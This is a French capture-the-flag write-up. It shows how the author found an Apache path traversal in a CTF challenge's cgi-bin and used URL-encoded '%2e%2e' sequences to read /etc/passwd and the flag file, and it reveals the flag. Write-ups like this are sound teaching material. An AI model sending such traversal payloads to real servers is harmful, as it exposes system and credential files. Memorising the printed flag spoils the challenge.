# Title: It shock you

La première des chose c'est de fouiller le site http://chall.battlectf.online:8083/ , juste une page.

Un fuzzing peut nous amener loin:

<img src="3.png">

Le fichier **test-cgi** via l'URL http://chall.battlectf.online:8083//cgi-bin/test-cgi présente un fichier test de config cgi 



Cela fait penser à une faille LFI. Peut on pourra traverser les different repos.

Le premier des fichier dont on est sûre est /etc/passwd

Notre  chemin doit etre relatif alors où se trouve /cgi-bin/test-cgi ???

**Default cgi-bin directory locations:**

1. Red Hat/CentOS/Rocky/Alma Linux: /var/www/cgi-bin/

2. Fedora Linux: /var/www/cgi-bin/

3. Debian or Ubuntu Linux: /usr/lib/cgi-bin/

4. FreeBSD Unix: /usr/local/www/cgi-bin/

Je suis parti de base sur `/var/www/cgi-bin/` et`/usr/local/www/cgi-bin/`  qui est le repos de base des page web. Ce qui me permet de retourner à la racine avec avec `/../../../../` ou `/../../../`

Pour avoir le fichier `/etc/passwd` il nous faut le chemin relatif `/cgi-bin/../../../../etc/passwd` ou `/cgi-bin/../../../etc/passwd`

Ceci ne marchait pas via le navigateur, alors j'ai pensé à encoder le path

En url encode `/../../../../` = `/%2e%2e/%2e%2e/%2e%2e/%2e%2e/`

On a donc : http://chall.battlectf.online:8083/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

<img src='4.png'>

Pour le flag: http://chall.battlectf.online:8083/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/flag.txt

**flag:** battleCTF{Apache_2.4.49_wahala_26e223dfefdcc5ce214a4b6ad83f5a49}

